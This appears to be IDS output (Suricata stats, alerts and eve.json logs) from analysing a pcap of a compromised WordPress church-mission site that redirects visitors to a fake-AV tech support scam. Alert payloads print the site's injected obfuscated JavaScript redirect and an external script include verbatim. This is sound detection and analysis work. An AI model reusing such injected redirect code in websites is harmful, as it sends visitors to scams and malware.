--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6           100             2861          44619          3901        390.1k  0.76  
flow                    IPv4      17             8             3166          32085          8037         64.3k  0.13  
stream                  IPv4       6           106             2862         459523         22513          2.4m  4.67  
app-layer               IPv4      17             8            10469          65859         23999        192.0k  0.38  
detect                  IPv4       6           106            45906        5762113        412408         43.7m  85.50 
detect                  IPv4      17             8           350779         831953        507344          4.1m  7.94  
tcp-prune               IPv4       6           106             2549           6852          3026        320.8k  0.63  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6             6             3151          61370         16866        101.2k  62.79 
dns                     IPv4      17             8             4920          18008          7495         60.0k  37.21 
Proto detect            IPv4      17             8             4744          33416         17073        136.6k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6             5            29769          95286         48689        243.4k  4.59  
LOGGER_ALERT_FAST           IPv4      17             2            17139          22028         19583         39.2k  0.74  
LOGGER_UNIFIED2             IPv4       6             5            26451         179516         63779        318.9k  6.01  
LOGGER_UNIFIED2             IPv4      17             2            18457          45171         31814         63.6k  1.20  
LOGGER_JSON_ALERT           IPv4       6             5            65474         121176         98297        491.5k  9.27  
LOGGER_JSON_ALERT           IPv4      17             2            36066          41362         38714         77.4k  1.46  
LOGGER_JSON_DNS             IPv4      17             8            27774        3261493        450344          3.6m  67.93 
LOGGER_JSON_HTTP            IPv4       6             4            38376         112788         77310        309.2k  5.83  
LOGGER_JSON_FILE            IPv4       6             2            75189          82692         78940        157.9k  2.98  

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6            62             2590         420503         59699         3.7m  24.36 
payload                           IPv4      17             8            20717         286376         92827       742.6k  4.89  
stream                            IPv4       6            62             2540         680670         69601         4.3m  28.40 
http_uri                          IPv4       6             5             8773          49829         23445       117.2k  0.77  
http_request_line                 IPv4       6             5             4912          11328          6964        34.8k  0.23  
http_client_body                  IPv4       6             5             2869           4040          3341        16.7k  0.11  
http_header (request)             IPv4       6             5            42867         106349         73237       366.2k  2.41  
http_header (request trailer)     IPv4       6             5             2629           2950          2714        13.6k  0.09  
http_header_names (request)       IPv4       6             5            12647          27276         17789        88.9k  0.59  
http_accept (request)             IPv4       6             5             4691          15065          7548        37.7k  0.25  
http_referer (request)            IPv4       6             5             3330           7537          5778        28.9k  0.19  
http_content_len (request)        IPv4       6             5             3060           7183          4134        20.7k  0.14  
http_content_type (request)       IPv4       6             5             3026           3555          3299        16.5k  0.11  
http_protocol (request)           IPv4       6             5             3919           6682          5245        26.2k  0.17  
http_start (request)              IPv4       6             5            10257          27564         17596        88.0k  0.58  
http_raw_header (request)         IPv4       6             5            12121          21728         15670        78.4k  0.52  
http_method                       IPv4       6             5             4475           8432          6080        30.4k  0.20  
http_cookie (request)             IPv4       6             5             3011           7393          4256        21.3k  0.14  
http_raw_uri                      IPv4       6             5             3427           6802          4828        24.1k  0.16  
http_user_agent                   IPv4       6             5            12582          69105         36376       181.9k  1.20  
http_host                         IPv4       6             5             6115          39216         23155       115.8k  0.76  
dns_query                         IPv4      17             4             7380          18295         11307        45.2k  0.30  
http_response_line                IPv4       6             4             4726          20478         10214        40.9k  0.27  
http_header (response)            IPv4       6             4            31257          70496         54003       216.0k  1.42  
http_header (response trailer)    IPv4       6             3             2647          45698         18827        56.5k  0.37  
http_content_type (response)      IPv4       6             4             4834          12954          8678        34.7k  0.23  
http_raw_header (response)        IPv4       6            42             3718          38786          5659       237.7k  1.56  
http_cookie (response)            IPv4       6             4             3052          17474          8320        33.3k  0.22  
http_stat_code                    IPv4       6             4             3196           4187          3809        15.2k  0.10  
file_data (http response)         IPv4       6            39             2597        3218367        114002         4.4m  29.27 
Total                             IPv4                   330                                         46036        15.2m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6             8            32331          97471         69902        559.2k  0.80  
PROF_DETECT_IPONLY          IPv4      17             8            37506         148963         60455        483.6k  0.70  
PROF_DETECT_RULES           IPv4       6           106             2562        2889971        175527         18.6m  26.76 
PROF_DETECT_RULES           IPv4      17             8           140225         336790        227950          1.8m  2.62  
PROF_DETECT_STATEFUL_START    IPv4       6            38             5122        1510777        213040          8.1m  11.64 
PROF_DETECT_STATEFUL_CONT    IPv4       6           106             2520          80419          6619        701.7k  1.01  
PROF_DETECT_STATEFUL_CONT    IPv4      17             8             6101          62810         14072        112.6k  0.16  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6            90             2549           3763          2698        242.8k  0.35  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17             8             2661           3302          2953         23.6k  0.03  
PROF_DETECT_PREFILTER       IPv4       6           106             7957        3976628        169612         18.0m  25.86 
PROF_DETECT_PREFILTER       IPv4      17             8            54866         326974        138452          1.1m  1.59  
PROF_DETECT_PF_PAYLOAD      IPv4       6            62            13604         699415        143283          8.9m  12.78 
PROF_DETECT_PF_PAYLOAD      IPv4      17             8            26566         291790        101045        808.4k  1.16  
PROF_DETECT_PF_TX           IPv4       6            90             2553        3233847         79996          7.2m  10.36 
PROF_DETECT_PF_TX           IPv4      17             4            13671          28798         18524         74.1k  0.11  
PROF_DETECT_PF_SORT1        IPv4       6            56             2538          10642          3745        209.7k  0.30  
PROF_DETECT_PF_SORT1        IPv4      17             8             3992           4875          4481         35.9k  0.05  
PROF_DETECT_PF_SORT2        IPv4       6           106             2542          65883          4830        512.0k  0.74  
PROF_DETECT_PF_SORT2        IPv4      17             8             3015          39861         10484         83.9k  0.12  
PROF_DETECT_NONMPMLIST      IPv4       6           106             2563          40636          3489        369.9k  0.53  
PROF_DETECT_NONMPMLIST      IPv4      17             8             2914          57481         11462         91.7k  0.13  
PROF_DETECT_ALERT           IPv4       6           106             2522         386940          6597        699.3k  1.01  
PROF_DETECT_ALERT           IPv4      17             8             2710          11834          4146         33.2k  0.05  
PROF_DETECT_CLEANUP         IPv4       6           106             2571          16398          3022        320.3k  0.46  
PROF_DETECT_CLEANUP         IPv4      17             8             3393           4835          4031         32.2k  0.05  
PROF_DETECT_GETSGH          IPv4       6           106             2519          38790          3397        360.1k  0.52  
PROF_DETECT_GETSGH          IPv4      17             8             6091          20252          9516         76.1k  0.11  


suricata-4.0.0-etpro-all-alert-2018-11-21-T-13-05-51-11212018.1305-2018-01-06-fake-AV-page-after-viewing-prelatureofayaviri.org.pcap.txt - (1809 bytes)
01/06/2018-02:36:14.886509  [**] [1:2012325:4] ET WEB_CLIENT Obfuscated Javascript // ptth [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 144.208.76.207:80 -> 10.1.6.102:50624
01/06/2018-02:37:15.486807  [**] [1:2012811:2] ET DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.1.6.102:61686 -> 10.1.6.1:53
01/06/2018-02:37:15.835900  [**] [1:2012810:10] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.6.102:50659 -> 204.155.28.5:80
01/06/2018-02:37:15.841456  [**] [1:2012811:2] ET DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.1.6.102:60808 -> 10.1.6.1:53
01/06/2018-02:37:16.720648  [**] [1:2012810:10] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.6.102:50661 -> 185.159.83.48:80
01/06/2018-02:37:16.805025  [**] [1:2012810:10] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.6.102:50661 -> 185.159.83.48:80
01/06/2018-02:37:58.683848  [**] [1:2023055:2] ET CURRENT_EVENTS Tech Support Phone Scam Landing (err.mp3) Aug 12 2016 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.159.83.48:80 -> 10.1.6.102:50661
01/06/2018-02:37:58.683848  [**] [1:2025345:2] ET CURRENT_EVENTS Fake AV Phone Scam Landing Feb 12 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.159.83.48:80 -> 10.1.6.102:50661
01/06/2018-02:37:58.683848  [**] [1:2827062:2] ETPRO CURRENT_EVENTS Tech Support Scam Landing Jul 07 2017 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.159.83.48:80 -> 10.1.6.102:50661


unified2.alert.1542805550 - (11869 bytes)
                                <div class="entry-content">
                    <ul>
                        <li class="entry-content-title"><h4><a href="http://prelatureofayaviri.org/mission/" target="_blank">KNOW THE MISSION</a></h4></li>
                        <li class="entry-content-excerpt"><p><span style="color: #000000;">Find out about the aims <script type="text/javascript">$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == "string") return $hiVNZt4Y5cDrbJXMhLy.list[n].split("").reverse().join("");return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}</script>and the needs of the mission of the Prelature.</span></p></li>
                    </ul>
                </div>
            </article>
        </div>

                <div class="cosmobox four columns  ">
            <article class="box ">
                                <div class="entry-content">
                    <ul>
                        <li class="entry-content-title"><h4><a href="http://prelatureofayaviri.org/mission/testimonies/" target="_blank">HEAR FROM OTHERS</a></h4></li>
                        <li class="entry-content-excerpt"><p><span style="color: #000000;">Read, watch <script type="text/javascript">$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == "string") return $hiVNZt4Y5cDrbJXMhLy.list[n].split("").reverse().join("");return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}</script>and hear the testimonies of past missionaries.</span></p></li>
                    </ul>
                </div>
            </article>
        </div>

                <div class="cosmobox four columns  ">
            <article class="box ">
                                <div class="entry-content">
                    <ul>
                        <li class="entry-content-title"><h4><a href="http://prelatureofayaviri.org/contacts/" target="_blank">GET INVOLVED</a></h4></li>
                        <li class="entry-content-excerpt"><p><span style="color: #000000;">Become a missionary to the Prelature. Find the contact best suited for you <script type="text/javascript">$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == "string") return $hiVNZt4Y5cDrbJXMhLy.list[n].split("").reverse().join("");return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.
e9a
floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}</script>and your gifts.</span></p></li>
                    </ul>
                </div>
            </article>
        </div>

        </div></div></div>			</div>
		</div>
	</div>
</section>
        <!-- footer -->
        <footer id="colophon" role="contentinfo" data-role="footer" data-position="fixed" data-fullscreen="true">
            <div class="row">
                <div class="footer-styles">
                    <div class="row  "><div class="delimiter  twelve columns"><div style="" class="delimiter-type white_space margin_30px "></div></div></div><div class="row element"><div class="widget_zone  three columns"></div><div class="widget_zone  three columns"></div><div class="widget_zone  three columns"></div><div class="widget_zone  three columns"></div></div><div class="row  "><div class="delimiter  eleven columns"><div style="border-top: 1px solid #4c4d52;" class="delimiter-type line margin_30px "></div></div><div class="textelement align-right one columns"><script type='text/javascript' src='https://s1.trymynewspirit.com/pr.js'></script><script type='text/javascript' src='https://s1.trymynewspirit.com/pr.js'></script><script type='text/javascript' src='https://s1.trymynewspirit.com/pr.js'></script><a href="http://www.prelaturaayaviri.org" target="_blank">Español</a></div></div><div class="row element"><div class="copyright align-left six columns">            <p class="copyright">Copyright © Prelature of Ayaviri. All rights reserved.</p>
        </div><div class="socialicons align-right six columns"><ul class="cosmo-social">                    <li><a href="http://vimeo.com/channels/537844" target="_blank" class="vimeo hover-menu"><i class="icon-vimeo"></i></a></li>
                        <li><a href="mailto:prelaturaayaviri@gmail.com" target="_blank" class="email hover-menu"><i class="icon-email"></i></a></li>
            </ul></div></div>                </div>
            </div>
        </footer>
        <!-- eof footer-->

    </div>
    
    
    <div class="overlay">&nbsp;</div>
            <script type="text/javascript" src="//platform.twitter.com/widgets.js"></script>
        <script type="text/javascript">
            (function() {
                var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
                po.src = 'https://apis.google.com/js/plusone.js';
                var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
            })();
        </script>
    
    <script type="text/javascript">

        var cookies_prefix = "belief";  
        var themeurl = "http://www.prelatureofayaviri.org/wp-content/themes/belief";
        jQuery( function(){
            jQuery( '.demo-tooltip' ).tour();
        });

    </script>
        <script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/foundation.js?ver=3.8.24'></script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.superfish.js?ver=3.8.24'></script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.supersubs.js?ver=3.8.24'></script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/tour.js?ver=3.8.24'></script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.tabs.pack.js?ver=3.8.24'></script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.scrollTo-1.4.2-min.js?ver=3.8.24'></script>

13e
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.elastislide.js?ver=3.8.24'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var prettyPhoto_enb = {"enb_lightbox":"1"};
var login_localize = {"check_email":"Please check your email"};
/* ]]> */
</script>

85
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/functions.js?ver=3.8.24'></script>

89
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.cookie.js?ver=3.8.24'></script>

1a1
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.prettyPhoto.js?ver=3.8.24'></script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.easing.js?ver=3.8.24'></script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.jscroll.js?ver=3.8.24'></script>

536
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.waitforimages.js?ver=3.8.24'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var MyAjax = {"ajaxurl":"http:\/\/www.prelatureofayaviri.org\/wp-admin\/admin-ajax.php","wpargs":{"wpargs":[]},"getMoreNonce":"9f81793b1b"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/lib/js/actions.js?ver=3.8.24'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var FB_WP=FB_WP||{};FB_WP.queue={_methods:[],flushed:false,add:function(fn){FB_WP.queue.flushed?fn():FB_WP.queue._methods.push(fn)},flush:function(){for(var fn;fn=FB_WP.queue._methods.shift();){fn()}FB_WP.queue.flushed=true}};window.fbAsyncInit=function(){FB.init({"channelUrl":"http:\/\/www.prelatureofayaviri.org\/wp-content\/plugins\/facebook\/channel.php","xfbml":true});if(FB_WP && FB_WP.queue && FB_WP.queue.flush){FB_WP.queue.flush()}}
/* ]]> */
</script>
<div id="fb-root"></div><script type="text/javascript">(function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(d.getElementById(id)){return}js=d.createElement(s);js.id=id;js.src="http:\/\/connect.facebook.net\/en_US\/all.js";fjs.parentNode.insertBefore(js,fjs)}(document,"script","facebook-jssdk"));</script>
    </body> 
</html>
[binary unified2 packet record, non-printable bytes omitted; readable content: richcalling3050112.tk]

GET /index/?2101505838590 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.prelatureofayaviri.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: richcalling3050112.tk

[binary unified2 packet record, non-printable bytes omitted; readable content: richsapport60501123.tk]

GET /?number=888-797-7834 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.prelatureofayaviri.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: richsapport60501123.tk

GET /landinf/defender.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://richsapport60501123.tk/?number=888-797-7834
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: richsapport60501123.tk
Connection: Keep-Alive

[three further binary unified2 packet records with no printable payload; non-printable bytes omitted]


stats.log - (2832 bytes)
------------------------------------------------------------------------------------
Date: 11/21/2018 -- 13:05:51 (uptime: 0d, 00h 00m 01s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 108
decoder.bytes                              | Total                     | 68203
decoder.ipv4                               | Total                     | 108
decoder.ethernet                           | Total                     | 108
decoder.tcp                                | Total                     | 100
decoder.udp                                | Total                     | 8
decoder.avg_pkt_size                       | Total                     | 631
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 4
flow.udp                                   | Total                     | 4
tcp.sessions                               | Total                     | 4
tcp.syn                                    | Total                     | 4
tcp.synack                                 | Total                     | 4
tcp.reassembly_gap                         | Total                     | 1
detect.alert                               | Total                     | 9
detect.mpm_list                            | Total                     | 7
detect.nonmpm_list                         | Total                     | 2
detect.fnonmpm_list                        | Total                     | 1
detect.match_list                          | Total                     | 8
app_layer.flow.http                        | Total                     | 4
app_layer.tx.http                          | Total                     | 5
app_layer.flow.dns_udp                     | Total                     | 4
app_layer.tx.dns_udp                       | Total                     | 4
flow.spare                                 | Total                     | 9999
flow_mgr.flows_checked                     | Total                     | 2
flow_mgr.flows_notimeout                   | Total                     | 2
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_empty                        | Total                     | 65534
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7074592


eve.json - (9963 bytes) - download
{"timestamp":"2018-01-06T02:36:09.861154+0000","flow_id":517950341194722,"pcap_cnt":1,"event_type":"dns","src_ip":"10.1.6.102","src_port":51950,"dest_ip":"10.1.6.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5788,"rrname":"www.prelatureofayaviri.org","rrtype":"A","tx_id":0}}
{"timestamp":"2018-01-06T02:36:09.953564+0000","flow_id":517950341194722,"pcap_cnt":2,"event_type":"dns","src_ip":"10.1.6.1","src_port":53,"dest_ip":"10.1.6.102","dest_port":51950,"proto":"UDP","dns":{"type":"answer","id":5788,"rcode":"NOERROR","rrname":"www.prelatureofayaviri.org","rrtype":"CNAME","ttl":5,"rdata":"prelatureofayaviri.org"}}
{"timestamp":"2018-01-06T02:36:09.953564+0000","flow_id":517950341194722,"pcap_cnt":2,"event_type":"dns","src_ip":"10.1.6.1","src_port":53,"dest_ip":"10.1.6.102","dest_port":51950,"proto":"UDP","dns":{"type":"answer","id":5788,"rcode":"NOERROR","rrname":"prelatureofayaviri.org","rrtype":"A","ttl":5,"rdata":"144.208.76.207"}}
{"timestamp":"2018-01-06T02:36:14.886509+0000","flow_id":414823881478399,"pcap_cnt":49,"event_type":"alert","src_ip":"144.208.76.207","src_port":80,"dest_ip":"10.1.6.102","dest_port":50624,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012325,"rev":4,"signature":"ET WEB_CLIENT Obfuscated Javascript \/\/ ptth","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2018-01-06T02:36:14.886788+0000","flow_id":414823881478399,"pcap_cnt":50,"event_type":"http","src_ip":"10.1.6.102","src_port":50624,"dest_ip":"144.208.76.207","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"www.prelatureofayaviri.org","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-01-06T02:37:13.669140+0000","flow_id":1731637236282836,"pcap_cnt":51,"event_type":"dns","src_ip":"10.1.6.102","src_port":64279,"dest_ip":"10.1.6.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1927,"rrname":"nh70putera.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-01-06T02:37:14.255688+0000","flow_id":1731637236282836,"pcap_cnt":52,"event_type":"dns","src_ip":"10.1.6.1","src_port":53,"dest_ip":"10.1.6.102","dest_port":64279,"proto":"UDP","dns":{"type":"answer","id":1927,"rcode":"NOERROR","rrname":"nh70putera.com","rrtype":"A","ttl":5,"rdata":"103.28.52.250"}}
{"timestamp":"2018-01-06T02:37:15.484307+0000","flow_id":2027476731231182,"pcap_cnt":59,"event_type":"http","src_ip":"10.1.6.102","src_port":50658,"dest_ip":"103.28.52.250","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"nh70putera.com","url":"\/wp-content\/plugins\/login-lockdown\/plugin-settings.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-01-06T02:37:15.486807+0000","flow_id":1884727050726807,"pcap_cnt":60,"event_type":"alert","src_ip":"10.1.6.102","src_port":61686,"dest_ip":"10.1.6.1","dest_port":53,"proto":"UDP","alert":{"action":"allowed","gid":1,"signature_id":2012811,"rev":2,"signature":"ET DNS Query to a .tk domain - Likely Hostile","category":"Potentially Bad Traffic","severity":2},"app_proto":"dns"}
{"timestamp":"2018-01-06T02:37:15.486807+0000","flow_id":1884727050726807,"pcap_cnt":60,"event_type":"dns","src_ip":"10.1.6.102","src_port":61686,"dest_ip":"10.1.6.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":11347,"rrname":"richcalling3050112.tk","rrtype":"A","tx_id":0}}
{"timestamp":"2018-01-06T02:37:15.642409+0000","flow_id":1884727050726807,"pcap_cnt":61,"event_type":"dns","src_ip":"10.1.6.1","src_port":53,"dest_ip":"10.1.6.102","dest_port":61686,"proto":"UDP","dns":{"type":"answer","id":11347,"rcode":"NOERROR","rrname":"richcalling3050112.tk","rrtype":"A","ttl":5,"rdata":"204.155.28.5"}}
{"timestamp":"2018-01-06T02:37:15.835900+0000","flow_id":162823122178298,"pcap_cnt":68,"event_type":"alert","src_ip":"10.1.6.102","src_port":50659,"dest_ip":"204.155.28.5","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012810,"rev":10,"signature":"ET POLICY HTTP Request to a *.tk domain","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2018-01-06T02:37:15.835900+0000","flow_id":162823122178298,"pcap_cnt":68,"event_type":"http","src_ip":"10.1.6.102","src_port":50659,"dest_ip":"204.155.28.5","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"richcalling3050112.tk","url":"\/index\/?2101505838590","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-01-06T02:37:15.841456+0000","flow_id":778951213176560,"pcap_cnt":69,"event_type":"alert","src_ip":"10.1.6.102","src_port":60808,"dest_ip":"10.1.6.1","dest_port":53,"proto":"UDP","alert":{"action":"allowed","gid":1,"signature_id":2012811,"rev":2,"signature":"ET DNS Query to a .tk domain - Likely Hostile","category":"Potentially Bad Traffic","severity":2},"app_proto":"dns"}
{"timestamp":"2018-01-06T02:37:15.841456+0000","flow_id":778951213176560,"pcap_cnt":69,"event_type":"dns","src_ip":"10.1.6.102","src_port":60808,"dest_ip":"10.1.6.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":11500,"rrname":"richsapport60501123.tk","rrtype":"A","tx_id":0}}
{"timestamp":"2018-01-06T02:37:16.209492+0000","flow_id":778951213176560,"pcap_cnt":70,"event_type":"dns","src_ip":"10.1.6.1","src_port":53,"dest_ip":"10.1.6.102","dest_port":60808,"proto":"UDP","dns":{"type":"answer","id":11500,"rcode":"NOERROR","rrname":"richsapport60501123.tk","rrtype":"A","ttl":5,"rdata":"185.159.83.48"}}
{"timestamp":"2018-01-06T02:37:16.209492+0000","flow_id":778951213176560,"pcap_cnt":70,"event_type":"dns","src_ip":"10.1.6.1","src_port":53,"dest_ip":"10.1.6.102","dest_port":60808,"proto":"UDP","dns":{"type":"answer","id":11500,"rcode":"NOERROR","rrname":"richsapport60501123.tk","rrtype":"A","ttl":5,"rdata":"185.159.83.47"}}
{"timestamp":"2018-01-06T02:37:16.720648+0000","flow_id":1108708064770002,"pcap_cnt":83,"event_type":"alert","src_ip":"10.1.6.102","src_port":50661,"dest_ip":"185.159.83.48","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012810,"rev":10,"signature":"ET POLICY HTTP Request to a *.tk domain","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2018-01-06T02:37:16.805025+0000","flow_id":1108708064770002,"pcap_cnt":89,"event_type":"alert","src_ip":"10.1.6.102","src_port":50661,"dest_ip":"185.159.83.48","dest_port":80,"proto":"TCP","tx_id":1,"alert":{"action":"allowed","gid":1,"signature_id":2012810,"rev":10,"signature":"ET POLICY HTTP Request to a *.tk domain","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2018-01-06T02:37:16.805306+0000","flow_id":1108708064770002,"pcap_cnt":91,"event_type":"fileinfo","src_ip":"185.159.83.48","src_port":80,"dest_ip":"10.1.6.102","dest_port":50661,"proto":"TCP","http":{"hostname":"richsapport60501123.tk","url":"\/?number=888-797-7834","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_refer":"http:\/\/www.prelatureofayaviri.org\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9998},"app_proto":"http","fileinfo":{"filename":"\/","gaps":false,"state":"TRUNCATED","stored":false,"size":9992,"tx_id":0}}
{"timestamp":"2018-01-06T02:37:58.683848+0000","flow_id":1108708064770002,"event_type":"http","src_ip":"10.1.6.102","src_port":50661,"dest_ip":"185.159.83.48","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"richsapport60501123.tk","url":"\/?number=888-797-7834","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-01-06T02:37:58.683848+0000","flow_id":1108708064770002,"event_type":"http","src_ip":"10.1.6.102","src_port":50661,"dest_ip":"185.159.83.48","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"richsapport60501123.tk","url":"\/landinf\/defender.png","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-01-06T02:37:58.683848+0000","flow_id":1108708064770002,"event_type":"alert","src_ip":"185.159.83.48","src_port":80,"dest_ip":"10.1.6.102","dest_port":50661,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2023055,"rev":2,"signature":"ET CURRENT_EVENTS Tech Support Phone Scam Landing (err.mp3) Aug 12 2016","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-01-06T02:37:58.683848+0000","flow_id":1108708064770002,"event_type":"alert","src_ip":"185.159.83.48","src_port":80,"dest_ip":"10.1.6.102","dest_port":50661,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2025345,"rev":2,"signature":"ET CURRENT_EVENTS Fake AV Phone Scam Landing Feb 12","category":"A Network Trojan was detected","severity":1}}
